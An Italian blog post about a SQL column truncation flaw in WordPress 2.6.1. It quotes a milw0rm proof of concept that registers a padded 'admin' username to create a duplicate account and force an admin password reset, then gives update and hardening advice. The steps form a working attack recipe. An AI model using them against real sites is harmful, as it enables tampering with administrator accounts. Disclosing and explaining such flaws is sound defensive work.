WordPress 2.6.1. QSL Columm T. Vulnerability

Aruba ha recentemente attivato un servizio di newsletter dedicato alla sicurezza, in particolare la prima riferiva che “la versione 2.6.1. di WordPress è esposta al rischio di hacking delle password utente e al reset della password con una password casuale: il sito non viene comunque esposto a rischio di defacement in quanto l’hacker non può conoscere la nuova password, ma è in ogni caso una patch che andrebbe applicata.”

Incuriosito, sono andato sul sito di milx0rm per vedere le ultime novità e, in effetti, qualcosa c’era:

 

  • WordPress 2.6.1. (QSL Columm Truncation Vulnerability) Admin takeover Exploit
  • WordPress 2.6.1. QSL Columm Truncation Vulnerability

In particolare, questo ultimo:

 

milworm.png

 

è quello a cui si riferiva l’articolo, il codice parla da solo:

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/
#mysql-and-sql-column-truncation-vulnerabilities/
# in this hack we can remote change admin password,
#if registration enabled
# greets: Stefan Esser, Lukasz Pilorz, 
#cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                       x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be
 send to correct admin email ;/

# milw0rm.com [2008-09-07]

 

Questa volta, per fortuna, il tutto si conclude solo con un reset della password, e comunque la nuova password viene reinviata all’indirizzo dell’amministratore.

Ricordo che, oltre che ad eseguire sempre gli aggiornamenti (versione 2.6.3), è opportuno cambiare sia il nome dell’amministratore (qui l’articolo) che il prefisso delle tabelle sel vostro MySQL, senza escludere l'ipotesi di iniziare un master in sicurezza informatica(link).

 

 

Lascia un commento